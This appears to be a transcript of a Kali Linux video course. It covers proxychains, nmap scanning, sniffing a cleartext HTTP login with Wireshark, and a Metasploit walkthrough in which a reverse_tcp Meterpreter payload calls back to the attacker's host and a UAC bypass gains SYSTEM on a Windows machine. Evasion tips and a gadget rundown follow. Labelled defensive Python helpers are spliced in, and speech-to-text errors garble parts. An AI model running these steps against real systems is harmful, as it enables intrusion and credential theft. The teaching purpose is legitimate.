to occur, and the permissions of root are very intricate, so new beginners are advised to use the sudo command only when absolutely necessary. For example, sudo su: with this command I am giving this terminal root permission; su stands for switch user. At this point it's going to ask for my admin password. Once I enter my password, I now have root access. Note how the password that I entered did not show up here; this is a security measure to prevent people from snooping on your root password, which is the endgame of this whole operating system. As you can also see, the symbol changed: if the dollar symbol is showing, it shows you're a standard user; when you switch to root you can easily see a hash symbol. This opens up a separate shell inside this terminal. For example, we can exit out of the root user to the standard user using the command exit, and once again we have the dollar sign, and the root has vanished over here.

There are some commands that will only work with administrative access. For example, when updating the Kali Linux system we have to use apt update; as you can see, it says "problem unlinking the file" because permission was denied. Now let's try this using sudo: sudo apt update. As you can see, it is updating the package repositories, which work as the software installed on the system. This can be done either by writing the sudo command every time we want to perform a root action, or we can just write sudo su once and write apt update alone. The fetching is complete over here. For the second example, let's say I just write sudo su, and this time it's not going to ask me for the password, because in this current terminal process I've already provided the root password once and it is in memory right now. When we used to update the system we had to write sudo apt update; that was because we were running it as a standard user. Now we are running it as the root user, so all we have to write is apt update and it's going to continue its work. There you go.

Another command that can be useful is the ping command. It's pretty self-explanatory: it's going to be checking the internet connectivity. It can be used to check internet connectivity, or if there is a local server on your system which needs to be pinged, then you can check that. For example, we write ping and we can use either an IP address or a domain. Let's say we want to check whether we can access google.com using this Kali Linux installation or not: we can write ping google.com, and you can see it shows the bytes being sent and received and how much time it took to complete the request. This can be done for local systems as well. For example, this installation of Kali Linux is being run on a virtual machine; once this machine is running I still have my host machine running over here, the IP address of which is 192.168.29.179. If I try to ping this from here, as you can see, the time to complete the request is drastically low compared to a website on the internet, considering this is on the local network. This is how the ping command works, and it can show you what kind of packets are transmitted, how many are received, if there was any kind of packet loss during the connection window, and other details.

A very important command when working with the terminal for a long duration is the history command. Pretty self-explanatory: there are so many commands being run that sometimes people forget what change they did or what directory name they put. The history command helps to recover some of the commands that you have written; it doesn't go all the way back, but it takes up many commands that were input in the last few processes. This is how the history command works. These are some of the most commonly used terminal commands. If you want to learn more about the terminal, please let
us know in the comment section and we will try to make an in-depth tutorial specifically for terminal commands on Linux.

Moving on, we learn how to configure proxy chains on our system. Proxying refers to the technique of bouncing your internet traffic through multiple machines to hide the identity of the original machine. A good tool that hackers use to accomplish this goal is proxychains. Essentially, you can use proxychains to run any program through a proxy server. This will allow you to access the internet from behind a restrictive firewall, which hides your IP address. Proxychains even allows you to use multiple proxies at once by chaining them together. One of the most important reasons that proxychains is used in a security context is that it's easy to evade detection. Attackers often use proxies to hide their true identities while executing an attack, and when multiple proxies are chained together it becomes harder and harder for a forensic professional to trace the traffic back to the original machine. When these proxies are located across countries, investigators would have to obtain warrants in the local jurisdictions where every proxy is located.

To see how proxychains works, let's open Firefox first and check our current IP address. Write firefox and there we go; as we can see, Firefox is now open. Let's check our current IP address right now: if you go to an address called myip.com, you can see it easily detects our country as India, and this is a public IP address. Now, if we move to the terminal again, here we can write proxychains -h. What this -h does is it finds the help; it stands for the help file. What we found out using this is that proxychains has a config file here: /etc/proxychains4.conf. Using this config file we can customize how our proxy chain should work. If we want to open that, we have to use it in a text editor. On Windows we have Notepad and other things like that, Microsoft Word, to edit documents; on Linux we have a tool called nano. To access nano we use the command nano and give the path of the file that we want to check. As of right now the proxychains config file is located over here, so we're going to follow the path: nano /etc/proxychains4.conf, and here we go, we see the config file.

There are three basic types of proxy chaining here. We have a strict chain, where all the proxies in the list will be used and they will be chained in order. We have a random chain, where each connection made through proxychains will be done by a random combination of proxies in the proxy list. And you have a dynamic chain; it's the same as a strict chain, but dead proxies are excluded from the chain. Here we can set up whichever type we want. To enable or disable a particular type we use the hash symbol: as you can see, right now all the lines have a hash symbol at the front except this one, dynamic chain; this is the one currently being used. Let's say I want to use the strict chain method, so I can add a hash here and remove the hash there. At any one point in time, only one of these three types should be enabled. Let's go for the dynamic chain: we can disable the strict chain by putting the hash in front and removing it from the dynamic chain.

As you can see below, we have a few commands for how to handle the nano text editor; this symbol is the Control key on your keyboard. Now if we want to write out, which is synonymous with saving the file, we go with Ctrl+O. So if I press Ctrl+O on my keyboard it says "File Name to Write", and we have to press Enter here, since we want to overwrite the proxychains4.conf file; we don't want to create a new file over here, so just press Enter, and we get "Permission denied". This permission denied we're getting is because we have opened this using a standard user; /etc is a system folder, and to be able to make changes we have to open it using the sudo command. To exit nano we have to use Ctrl+X. We use Ctrl+X, we're going to clear, and this time we're going to use the sudo command: sudo nano /etc/proxychains4.conf, and we have the same file open again. Now this time, if we want to make a change, let's say we're going to use a strict chain instead of a dynamic chain: we remove the hash from strict, we use Ctrl+O for the save option, we press Enter, and it says "Wrote 160 lines". Again, if we want to reverse this change, we put the hash over here, enable dynamic chain, press Ctrl+O, press Enter, and it says "Wrote 160 lines". Now we can exit straight away using Ctrl+X.

Right now we have not provided any file or proxy for the chain. We can get proxy IP addresses from the internet, but we have to make sure that they are safe and they don't snoop on our data. When there are no proxies provided, it's going to use the Tor network, but for that we have to start Tor. Tor is a service in Linux; to know more about Tor we can write sudo
systemct ctl which is used to know the status of services on the Linux operating system and status of to uh system ctl sorry uh as instead of stl It should be systemctl status to as you can see it is a to service anonymizing overlay network for TCP connections and it’s currently inactive now to start this up we have to write sudo systemct ctl start dot now if we repeat the same sudo systemctl status store as you can see it’s active now you can see the green logo over here okay to integrate the Firefox and the browser we can use the proxy chains command directly over here we can write proxy chains we can use Firefox to launch our web browser and let’s say if we want to visit google.com we press enter and the Firefox window is launched and it should open up google.com next and there we go if we go to my ip.com once again as you can see we have a different IP address and the country is unknown as well so this is how we can use proxy chains to anonymize uh internet usage when using Kali Linux next on our agenda is the ability to scan networks using N MAPAP at its core N MAPAP is a network scanning tool that uses IP packets to identify all the devices connected to a network can learn more about N map using the help file as you can see these are some of the parameters that can be used when scanning ports of a system you can see the version and the URL of the of the service over here the primary uses of N mapap can be broken into three core processes first the program gives you detailed information on every IP active on your network and then each IP can then be scanned secondly it can also be used to providing a lot of live hosts and open ports as well as identifying the OS of every connected device thirdly NAPAP has also become a valuable tool for users looking to protect personal and business websites using N MAPAP to scan your own web server particularly if you’re hosting your website from home is essentially simulating the process that a hacker would use to attack 
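The chain-mode toggle and the proxy list edited above, checked programmatically: exactly one chain mode uncommented, and every proxy under [ProxyList] accounted for. This is an added Python example, not part of the course or of the proxychains project; the configuration text is constructed to mirror the edits made in nano.

```python
"""Sanity-check a proxychains4.conf the way the walkthrough describes.

Added example, not course material. The '#' toggle on the chain-mode lines
is the same edit done with nano above, here done (and verified) in code.
"""

CHAIN_MODES = ("strict_chain", "dynamic_chain", "random_chain", "round_robin_chain")

# Constructed sample: strict_chain commented out, dynamic_chain enabled,
# and only the default local Tor SOCKS entry in the proxy list.
SAMPLE_CONF = """\
# proxychains.conf  VER 4.x
#strict_chain
dynamic_chain
#random_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
# add proxy here ...
# defaults set to "tor"
socks4 \t127.0.0.1 9050
"""


def parse_proxychains(text):
    """Return (enabled_modes, proxies) from proxychains4.conf text.

    A directive counts only when it is not commented out: a leading '#'
    disables it, which is exactly the toggle the walkthrough uses.
    """
    enabled, proxies, in_list = [], [], False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_list = line.lower() == "[proxylist]"
            continue
        if in_list:
            parts = line.split()          # type host port [user pass]
            if len(parts) >= 3:
                proxies.append({"type": parts[0], "host": parts[1], "port": int(parts[2])})
            continue
        word = line.split()[0].lower()
        if word in CHAIN_MODES:
            enabled.append(word)
    return enabled, proxies


def check_conf(text):
    """Return a list of problems; an empty list means the file is sane."""
    enabled, proxies = parse_proxychains(text)
    problems = []
    if not enabled:
        problems.append("no chain mode enabled (uncomment exactly one of %s)"
                        % ", ".join(CHAIN_MODES))
    elif len(enabled) > 1:
        problems.append("more than one chain mode enabled: " + ", ".join(enabled))
    if not proxies:
        problems.append("[ProxyList] is empty; nothing will be chained")
    for p in proxies:
        # Anything that is not the local Tor SOCKS port is a third-party proxy,
        # which the walkthrough warns may snoop on your traffic.
        if p["host"] not in ("127.0.0.1", "localhost"):
            problems.append("non-local proxy %s:%d (%s): verify you trust it"
                            % (p["host"], p["port"], p["type"]))
    return problems


def toggle_mode(text, mode):
    """Return the conf with `mode` uncommented and the other modes commented."""
    out = []
    for raw in text.splitlines():
        bare = raw.lstrip("#").strip().lower()
        if bare in CHAIN_MODES:
            out.append(bare if bare == mode else "#" + bare)
        else:
            out.append(raw)
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    print("enabled:", parse_proxychains(SAMPLE_CONF)[0])
    print("problems:", check_conf(SAMPLE_CONF) or "none")
    print("after toggle:", parse_proxychains(toggle_mode(SAMPLE_CONF, "strict_chain"))[0])
```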
Attacking your own site in this way is a powerful way of identifying security vulnerabilities. As we already discussed, the host Windows 10 machine on the system has an IP address of 192.168.29.179. If you want to test the OS scan of the system, we are going to first get root permission over here: we use the sudo command, and now we are a root user. We are going to launch the command nmap -O, which is supposed to be an OS detection scan, with the IP address of the host system, 192.168.29.179. In a legitimate penetration testing scenario we can use the IP address of the vulnerable device over here. We are going to let it scan for a while, and it's going to give us some guesses on what the OS can be. As you can see, the scan is done, and it has shown some of the ports that are open: you can see the MSRPC port open, the HTTPS 443 port open, which is used to connect to the internet, and it has some aggressive OS guesses as well. For example, it thinks there's a 94% chance that it's going to be Microsoft Windows XP Service Pack 3; that's partly because a lot of the Windows XP update packages are still prevalent on Windows. Now that the OS detection is confirmed, there are multiple more details that we can gather from Nmap. Let's go with the nmap -A command, which is supposed to capture as much data as possible. There is also a speed setting, you can call it a speed setting or a control setting, of -T; -T ranges from T0 to T1 to T2 all the way up to T5. This basically determines how aggressively the victim is being scanned. If you scan slowly, it'll take more time to provide the results, but it will also give less chance for the intrusion detection system or firewall on the vulnerable machine to detect that someone is trying to penetrate the network. For now, if you want to go with somewhat of a high speed, we can go with T4 and provide the same IP address of the local machine I am trying to attack. It's going to take a little bit of time since it's trying to capture a lot of information.

As you can see, the results are now here. It launched a scan and took a few top ports that are most likely vulnerable from a Windows XP perspective, and it showed a few ports over here. It has not shown 991 filtered ports, which could not be attacked anyway since they were closed for outside access. It shows a few fingerprint settings like the connection policies and the port details; it shows HTTP options and some other intricate details that can be used when you are attacking its servers. It shows a VMware version that it's running and a few other ports over here. Apart from that, we also have the aggressive OS guesses over here, just like we did with -O, and you can see this time it is showing Windows 7 at 98%. No exact OS matches, since if there were any exact OS matches we could have seen a 100% chance over here. This is a traceroute; a traceroute will be the time and the path a connection request takes from the source to the destination. For example, this request went from 192.168.72.2 to the destination address. Since this is a local machine it took only a single step; on multiple occasions, if you're trying to access a remote system, it's going to be a number of traceroute steps when it jumps from firewall to firewall and router to router. This is how we can use Nmap to find information about a system and find some vulnerable ports we can access.

Moving on, we have a tutorial on how to use Wireshark to sniff network traffic. To start using Wireshark we are going to have to open the application first. Now, during installation of Wireshark there is an option to enable whether non-root users can capture traffic or not; in my installation I have disabled that, so I will be launching Wireshark using the root user itself. Also, to capture data we need an external Wi-Fi adapter. You can see it over here in the VM tab, Removable Devices, 802.11n WLAN; this is an external Wi-Fi adapter which is inserted into my USB port.
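A defender-side follow-up to scanning your own host: parse Nmap's grepable (-oG) output and flag open ports that are not on an allowed baseline, plus the filtered-port count the scan above reports. This is an added Python example, not code from the course; the scan text and the baseline are constructed (the 3389 entry is invented so that there is a finding to show).

```python
"""Compare nmap -oG output against an allowed-port baseline.

Added example, not from the course. The grepable line format is
"Host: <ip> (<name>)<TAB>Ports: port/state/proto/owner/service/rpc/version/, ..."
"""
import re

# Constructed output mirroring the scan in the walkthrough (MSRPC and HTTPS
# open on the Windows host, 991 ports filtered). 3389 is added for the demo.
SAMPLE_GREPABLE = """\
# Nmap 7.94 scan initiated as: nmap -O -oG - 192.168.29.179
Host: 192.168.29.179 ()\tStatus: Up
Host: 192.168.29.179 ()\tPorts: 135/open/tcp//msrpc///, 443/open/tcp//https///, 3389/open/tcp//ms-wbt-server///\tIgnored State: filtered (991)
# Nmap done
"""

# What we expect our own web server to expose; anything beyond this is a finding.
BASELINE = {"192.168.29.179": {443}}


def parse_grepable(text):
    """Map host -> {port: service} for open TCP ports in nmap -oG output."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        # Tab-separated "Key: value" fields; values may contain spaces.
        fields = dict(f.split(": ", 1) for f in line.split("\t") if ": " in f)
        host = fields["Host"].split()[0]
        entry = hosts.setdefault(host, {})
        for spec in fields.get("Ports", "").split(","):
            spec = spec.strip()
            if not spec:
                continue
            port, state, proto, _owner, service = spec.split("/")[:5]
            if state == "open" and proto == "tcp":
                entry[int(port)] = service
    return hosts


def ignored_state(text):
    """Return (state, count) for the ports Nmap collapsed, e.g. ('filtered', 991)."""
    m = re.search(r"Ignored State: (\w+) \((\d+)\)", text)
    return (m.group(1), int(m.group(2))) if m else None


def unexpected_open_ports(hosts, baseline):
    """Return {host: {port: service}} for open ports not allowed by the baseline."""
    findings = {}
    for host, ports in hosts.items():
        allowed = baseline.get(host, set())
        extra = {p: s for p, s in ports.items() if p not in allowed}
        if extra:
            findings[host] = extra
    return findings


if __name__ == "__main__":
    hosts = parse_grepable(SAMPLE_GREPABLE)
    print("open:", hosts)
    print("ignored:", ignored_state(SAMPLE_GREPABLE))
    for host, extra in unexpected_open_ports(hosts, BASELINE).items():
        for port, service in sorted(extra.items()):
            print(f"FINDING {host}: {port}/tcp ({service}) open but not in baseline")
```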
You can see it over here if I write iwconfig; this is the one, wlan0. This is absolutely necessary because we need to have monitor mode. It's not required, we won't need it, for sniffing data on Wireshark right now, but it's going to be necessary later on in this tutorial, as we will see. For now, we can just start up Wireshark by writing its name on the command line, and it should start the program. Here we go; here it's going to check which of the adapters we want to use. For example, right now eth0, which is supposed to stand for Ethernet port zero, you can see data is being transmitted up and down. We are going to select eth0, and we have started capturing data. You can see the data request from the source, the destination, the time and which protocol it is following; everything we can see, and we can see the IPv4 flags here as well, as you can see over here. To capture internet traffic we can try running Firefox. If we just write wikipedia.com, you can see the number of requests increasing; okay, this is a spelling mistake, wikipedia. Here you can see the application data of all these requests going up, and they're connected to a destination server of 103.102.166.224. Now, even if you check the Transmission Control Protocol flags over here, and so many more things, we cannot find anything beneficial. As you can see, the information over here is gibberish, which is supposed to be, since it's supposed to be encrypted. Now, this is possible due to this being an HTTPS website; hence you can see the lock symbol over here, and the connection is supposed to be secure.

Now what about HTTP pages? We have seen many people recommend not to visit HTTP websites, and even if you have to visit, not to provide any critical information. For example, let's go to a random HTTP page over here. As you can see, this is saying "Connection is not secure", and this is an HTTP page and not HTTPS. Now let's check some of the information that is passing through this. This is a login form; let's say I have a legitimate account over here. If I write my account name, and my password is supposed to be password1234, I press Login, and the password does not match, because I do not have an account over here. But let's say I did and I was logged in as expected. We can go to Wireshark; we can use filters over here. Now, all the requests that I'm sending are TCP requests, so I can write a filter containing tcp contains whatever string is being passed. Let's say for the username I write my account name, so I can just write my account name over here and press Enter to find a request over here. Now, as you can see, there are many flags over here; if I go to the HTML Form URL Encoded section and open up some of its flags, as you can see, I can see my account name and Simplilearn password over here. These are the same details that I input on the website. Let's say I did have a legitimate account on this website; I would have logged in with no problems, but anyone who would be using Wireshark to sniff on the data can easily get my credentials from here. This is why it's recommended not to provide any information on HTTP pages; the security is not up to the mark. Always look for the lock symbol when visiting any website or making any internet transactions or providing any information. This is how we can use Wireshark to detect transmissions and sniff packet data that is being transferred through the network adapter.

Next, we have to learn about what Metasploit is. The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS development. We can open up the terminal here; we are going to allow root access, and to open up Metasploit the keyword is msfconsole. It's going to take a little bit of time to start it up. Now the Metasploit console has been loaded; from here we can decide what type of attack we want to launch and what kind of exploits we can launch against vulnerable targets.
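The credential exposure shown in Wireshark above, turned into a check: decode an HTML form URL-encoded POST from a captured TCP payload and flag credential fields that travel over plain HTTP, while a TLS application-data record yields nothing readable. This is an added Python example, not code from the course; both captured payloads are constructed, and tcp_contains mimics the display filter used above.

```python
"""Flag credentials submitted over cleartext HTTP in captured TCP payloads.

Added example, not from the course. Packets are plain dicts standing in for
what Wireshark shows per TCP segment; the payloads are constructed.
"""
from urllib.parse import parse_qs

# Constructed HTTP POST exactly as the HTTP-page login above would send it.
HTTP_POST = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: example.test\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 42\r\n"
    b"\r\n"
    b"username=simplilearn&password=password1234"
)

# Constructed TLS 1.2 application-data record (type 0x17); the 32 payload
# bytes are placeholder ciphertext, i.e. the "gibberish" seen for HTTPS.
TLS_RECORD = b"\x17\x03\x03\x00\x20" + bytes.fromhex(
    "4c1f9a0e7b33d8c2a5e6f1904b7d2c8e13f5a7b9c0d2e4f6081a3c5e7f9b1d3a"
)

PACKETS = [
    {"src": "192.168.72.130", "dst": "93.184.216.34", "dport": 80, "payload": HTTP_POST},
    {"src": "192.168.72.130", "dst": "103.102.166.224", "dport": 443, "payload": TLS_RECORD},
]

CREDENTIAL_FIELDS = {"password", "passwd", "pass", "pwd", "username", "user", "email", "login"}


def tcp_contains(packets, needle):
    """Rough equivalent of Wireshark's `tcp contains "needle"` display filter."""
    return [p for p in packets if needle in p["payload"]]


def parse_http_form_post(payload):
    """Return (path, fields) for a URL-encoded HTTP POST, or None if not one."""
    head, sep, body = payload.partition(b"\r\n\r\n")
    if not sep:
        return None                      # no HTTP header block (e.g. a TLS record)
    lines = head.split(b"\r\n")
    request = lines[0].split()
    if len(request) != 3 or request[0] != b"POST":
        return None
    headers = {}
    for h in lines[1:]:
        k, _, v = h.partition(b":")
        headers[k.strip().lower()] = v.strip()
    ctype = headers.get(b"content-type", b"")
    if not ctype.startswith(b"application/x-www-form-urlencoded"):
        return None
    length = int(headers.get(b"content-length", len(body)))
    form = parse_qs(body[:length].decode("ascii", "replace"))
    return request[1].decode("ascii", "replace"), {k: v[0] for k, v in form.items()}


def find_cleartext_credentials(packets):
    """List every packet whose plain-HTTP form body carries a credential field."""
    findings = []
    for pkt in packets:
        parsed = parse_http_form_post(pkt["payload"])
        if parsed is None:
            continue
        path, fields = parsed
        leaked = {k: v for k, v in fields.items() if k.lower() in CREDENTIAL_FIELDS}
        if leaked:
            findings.append({"dst": pkt["dst"], "dport": pkt["dport"],
                             "path": path, "fields": leaked})
    return findings


if __name__ == "__main__":
    print("tcp contains simplilearn:", len(tcp_contains(PACKETS, b"simplilearn")), "packet(s)")
    for f in find_cleartext_credentials(PACKETS):
        print(f"CLEARTEXT CREDENTIALS to {f['dst']}:{f['dport']} {f['path']}: {f['fields']}")
```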
For example, like we already discussed, I'm running this virtual machine on a Windows 10 host machine. So if I open the command prompt for my Windows 10 over here, if I need to check the IP address, I go with ipconfig; here you can see the IP address of this local machine. Moving on, if we have to attack that machine, let's say we want to see what kind of exploits are going to work over there. Now, we already know that Windows has some common vulnerabilities; one of those vulnerabilities is the HTA server vulnerability. HTA is supposed to be an HTML application, but when passed the right payload it can be used to open a backdoor into a system. To start off with Metasploit and accessing such applications, we are going to use the command use exploit, and the name of the HTA server module is this, exploit/windows/misc/hta_server, where misc stands for miscellaneous. As you can see, it already found this one. All right, now there are some options that we need to set for this exploit to go through. For example, you can see some of the options over here; there's a payload. The payload is supposed to be the malicious file that we are going to send via the HTML application, which allows us to get the backdoor. For example, right now the payload, which is the malicious file, is windows/meterpreter/reverse_tcp, completely understandable. Now let's set the LHOST; LHOST, RHOST and SRVHOST should be the one where we are going to launch the attack from. For example, if we launch another tab of this console and we just type ifconfig, the IP address is 192.168.72.130, so we are going to set the LHOST as 192.168.72.130, and we are going to do the same thing with SRVHOST. We are going to set a port where we need to capture the backdoor access. Next, the payload has already been set; this payload will launch a backdoor and give us Meterpreter access to the system. Meterpreter can be considered as an upgrade of a normal command prompt shell; we will look into it once we get the access in the first place. Now that we have set the commands, we can press exploit and press Enter. Now you can see we have a URL over here; we are going to copy this URL. Once the URL is copied, we take it into the browser and paste it. This will ask us to download this file. Now, as per browser security settings, this file should be blocked by default; we can decide to keep it, and with the correct formulation of this malicious package, even the browser antivirus software will not be able to detect good payloads. We are going to save this file, and we are going to open it: "publisher could not be verified". If we press Run and we go back to our Metasploit access over here, you can see it has already captured a URL of the HTA server and it is writing "Delivering payload". We just have to wait for a few seconds till the payload is delivered; it has sent this much amount of data, Meterpreter session one is opened, and we should get the access soon. There we go. Now, to understand where the session is set, we can write sessions -i; as you can see, it has a Meterpreter over here. We are going to write sessions -i, the session ID is one, so we are going to write 1, and we have the Meterpreter access. Now, to get a fair idea of the system, we are going to write sysinfo, and it's going to give the computer name, the OS, the architecture, all these things. We can write the help command to see what are the things that we can get out of the system: we can take screenshots, we can control the webcam and start a video chat, we can take a lot of things over here. There are other commands as well where we can change the file directory, like the cat command, cd command; there are so many things that work in the normal cmd which we can run on Meterpreter as well. Now, if you want to access the command prompt of the system directly, we can go with this: we have to write shell, and there we go, we are in the Downloads folder right now. To see if this is the same computer or not, we are going to write ipconfig; as you can see, it is our victim machine with 192.168.29.171. We can just press exit and we are back with the Meterpreter access. This is how we can use Meterpreter and Metasploit to gain access to a Windows 10 machine.

Next, let's take a look at how we can get root access from a Windows 10 system. We just learned how we can get Meterpreter access from a system. We can background this Meterpreter session by writing background and pressing Enter; we can still see the session, sessions -i, it's still present over here. Now, these kinds of access are not administrative access; these are the kind of backdoors that can be created for standard users. But to get complete access to a system, including the Program Files, the Windows documents, we need to have root access or administrative access. To do that, we are going to use another exploit. Reminder that the Meterpreter session of the standard access is already present and we are not messing with it right now; we are going to set up another session, albeit with the same machine. That exploit name is use exploit/windows/local/bypassuac_eventvwr, and there we go. Now, if we check the options that we can put in the system, we have to choose an exploit target; we need to put a session as well. Let's say we are going to use session one; this is the session that has the Meterpreter access with the standard user, it doesn't have the system user. We are going to write set session 1 and we are going to run exploit. It runs a few commands and it opened a second Meterpreter session; as you can see, it is session two. If I write sysinfo you can still see I'm not the system user right now; I'm still just a normal user. How can we check that? If you go to shell, I'll still see Users\shabb\Downloads, all these things. If I press exit, go back to Meterpreter, there is a command on Meterpreter, getsystem: it attempts to elevate your privilege to that of the local system, which basically means you get promoted into root access. So if we write getsystem, and due to Named Pipe Impersonation we now have the system root access. As you can see, now it has become x64 and we are the admin user. Now if I go to shell I can easily go back to Windows and I can easily access these things. This kind of control over the Windows folders and the Program Files folders, these kinds of things are not possible if you do not have admin access or the command prompt has not been run with admin permissions. This is how we can use privilege escalation to get into an admin access system. We used the second exploit, which was the bypassuac_eventvwr exploit, and essentially used it with the first session. As you can read here, "Windows Escalate UAC Protection Bypass"; it was first disclosed in 2016, but it still works on some systems. This is how we can get root access on a Windows 10 installation. Hope you learned something new today.

Today we are going to talk about some really interesting and powerful hacking gadgets you should know about in 2024. But remember, this is just for learning; we don't want anyone getting into trouble. So, moving on, the best way to keep your computers and devices safe is to know about the risks. Some risks are easy to cater for: use strong passwords, don't download from bad websites, and don't hand your unlocked device to strangers. But there are also hidden dangers that can cause big problems. Some tools look innocent but can be very dangerous. Here are seven gadgets that look normal but are actually powerful hacking tools. These tools are made for security experts to test systems, but they can be misused.

So let's kick things off with a device that's small but incredibly powerful: the Raspberry Pi. The Raspberry Pi is a compact and affordable computer that has revolutionized the tech world. Originally designed for educational purposes, it has become a favorite among hobbyists, makers and even professionals. Despite its small size, it boasts impressive capabilities, including multiple USB ports, HDMI output and support for various operating systems like Linux and Windows 10 IoT Core. The Raspberry Pi can be used for a wide range of projects, from simple programming and gaming to complex IoT systems and home automation. The Raspberry Pi can also be a dangerous hacking tool; with the right software it can be used to perform a variety of hacking tasks. For example, it can run Kali Linux, a popular operating system for penetration testing. This allows it to be used for network scanning, password cracking and even setting up rogue access points to intercept data. Its small size makes it easy to hide, and its affordability means it's accessible to many. In the wrong hands, this innocent-looking device can become a powerful tool for malicious activities.

Now that we have seen the potential of the Raspberry Pi, which by the way is one of my personal favorites for tinkering, let's move on to another seemingly simple but powerful device: the Wi-Fi adapter. A Wi-Fi adapter might seem like a simple device used to connect to wireless networks, but it can be a potent hacking tool in the wrong hands. These adapters, when paired with the right software, can intercept and monitor wireless communications, making them invaluable for network analysis and penetration testing. For example, they can be used with tools like aircrack-ng to crack Wi-Fi passwords. Hackers can use Wi-Fi adapters to perform attacks such as packet sniffing and man-in-the-middle attacks; these activities can lead to unauthorized access to networks, data theft and severe security breaches. It's like having a digital spy in your pocket. While essential for legitimate security testing, it's crucial to be aware of the potential misuse and to secure your own wireless networks against such threats.

Speaking of Wi-Fi, you won't believe how sneaky this next device is. Let's take a look at a device that takes wireless hacking to a whole new level: the Wi-Fi Pineapple. The Wi-Fi Pineapple looks like a standard router, but it is a sophisticated device used for hacking wireless networks. It allows attackers to create rogue Wi-Fi access points, tricking users into connecting and revealing their login credentials. Imagine connecting to what looks like a free public Wi-Fi, only to have your data intercepted. This device is capable of advanced man-in-the-middle attacks, monitoring and recording data from all connected devices. Additionally, the Wi-Fi Pineapple can capture Wi-Fi handshakes, which can then be used to crack network passwords. Its powerful features make it a favorite among penetration testers for assessing network security, but in the wrong hands it can be used for malicious activities, highlighting the importance of robust wireless security.

So, from Wi-Fi to Bluetooth, which is everywhere these days, right? Let's now explore a powerful tool for Bluetooth hacking: the Ubertooth One. The Ubertooth One is an open-source Bluetooth testing tool that appears to be a simple USB dongle. Despite its unassuming appearance, it can monitor and analyze Bluetooth communications, making it a valuable asset for those testing the security of Bluetooth devices. Think of it as a spy for Bluetooth traffic. The Ubertooth One can capture Bluetooth packets, perform Bluetooth attacks and even explore vulnerabilities in Bluetooth networks. Its ability to dissect Bluetooth traffic makes it a powerful tool for both legitimate security research and potential misuse. Understanding its capabilities helps highlight the importance of securing Bluetooth-enabled devices against unauthorized access and attacks.

Continuing with radio frequency tools, which honestly sounds like something out of a spy movie, let's discuss the HackRF One and its versatile capabilities. The HackRF One is a versatile software-defined radio (SDR) platform that can transmit and receive radio signals from 1 MHz to 6 GHz. It looks like a standard electronic device but can be used for a wide range of hacking activities. Imagine being able to capture and manipulate signals across a broad spectrum. With the HackRF One, users can capture and analyze various radio signals, jam frequencies and even spoof signals to manipulate communication systems. This tool is particularly useful for exploring and testing the security of wireless communication systems. While it serves an essential role in legitimate research and development, the HackRF One also demonstrates the need for robust security measures to protect against radio-frequency-based attacks.

So now let's look at a tool that takes advantage of a computer's trust in USB devices, and trust me, this one's sneaky: the USB Rubber Ducky. The USB Rubber Ducky is a device that looks like a regular flash drive but acts like a keyboard, typing commands into any computer it's plugged into. Hackers use it to execute pre-programmed scripts that can steal data, install malware or take control of the target device. It's like a tiny digital ninja. This tool exploits the trust computers have in USB devices, making it a potent weapon for cyber attacks. It's a reminder to be cautious about plugging in unknown USB devices, as they could be Rubber Duckies in disguise, ready to unleash harmful commands and compromise your system security.

So finally, we have got a real undercover gadget here. Let's uncover the secret capabilities of the LAN Turtle. The LAN Turtle looks like a typical USB Ethernet adapter, but it's a covert hacking tool used to monitor and infiltrate networks. Don't let its innocent appearance fool you; it provides hackers with several capabilities, such as network scanning, DNS spoofing and data capture. The LAN Turtle can be discreetly plugged into a network, allowing access to gather sensitive information and gain unauthorized access. Its ability to operate undetected makes it particularly dangerous, emphasizing the need for vigilance and robust network security measures to prevent unauthorized devices from connecting to your systems. So there you have it, guys; we have explored some of the most powerful and dangerous hacking gadgets out there. These tools can do a lot of damage if they fall into the wrong hands; that's why it's so important to stay informed and vigilant about cybersecurity.

Hey everyone, today we will explore the world of cybersecurity
with HackerGPT, a specialized version of ChatGPT designed for ethical hacking and cybersecurity. In a digital landscape where cyber attacks occur every 39 seconds, causing billions in damages annually, HackerGPT provides the essential tools and knowledge to defend against these threats. So HackerGPT offers guidance on a wide range of topics, including security practices, ethical hacking techniques and scripting for system security. Cybercrime damages are expected to reach $6 trillion annually, making it a major challenge for organizations, and if we talk about some of the breaches, in 2020 over 36 billion records were exposed due to data breaches, and the infamous Equifax breach of 2017, where 147 million people's information was compromised, highlights the importance of regular security assessments and vulnerability management. These are the areas where HackerGPT excels, and HackerGPT strictly adheres to ethical guidelines, refusing to assist with any unethical or illegal queries. So our commitment is to provide guidance that adheres to legal and professional standards, helping you become a responsible cybersecurity professional. So guys, let's get started with HackerGPT, which will equip you with the knowledge and skills to defend against cyber threats ethically and effectively. Craving a career upgrade? Subscribe, like and comment below; dive into the link in the description to fast-track your ambitions. Whether you're making a switch or aiming higher, Simplilearn has your back. And just a quick info for you guys: if you are an aspiring cybersecurity professional looking for online training and certification from prestigious universities, in collaboration with leading experts, to enhance your credibility, then search no more; Simplilearn's Postgraduate Program in Cyber Security from MIT University in collaboration with EC-Council should be your right choice. For more details you can use the link in the description box and pinned comment.

So let's get started. So guys, this is ChatGPT, and this is the paid version of ChatGPT. What I was telling you is this is the Explore GPTs section, so here you can find all the GPTs that are created by OpenAI or by individuals, or you can find the companies who have created GPTs. So you can find these are the recently used, and this is the most used HackerGPT; you can find other GPTs also, that is HackerGPT, and you could see that they have been used by 5,000 plus users and this one has been used by 10,000 plus users. So you can just search for Ethical Hacker GPT here, and it has been rated 4.5 stars, 10,000 plus conversations, and these are the conversation starters if you need any assistance, and the capabilities you can see here, and the ratings given by users, and more by the creator who has created this. So we'll start with this; we'll start the chat here. And I want to tell you guys that ChatGPT doesn't answer non-ethical questions, so if you try to extract that information from ChatGPT that won't be possible, but we can do a bit, like we can cross the line a bit with Ethical Hacker GPT, but that should be used for ethical purposes only. So I will show you guys how you can utilize this GPT. And one more thing, guys: if you want to create your own GPT, you can also create that. You can go to the Explore GPTs section, and here's the Create option; click on Create, and here you can start creating your GPT. If you click on Configure, you can write the name of your GPT, description, instructions and 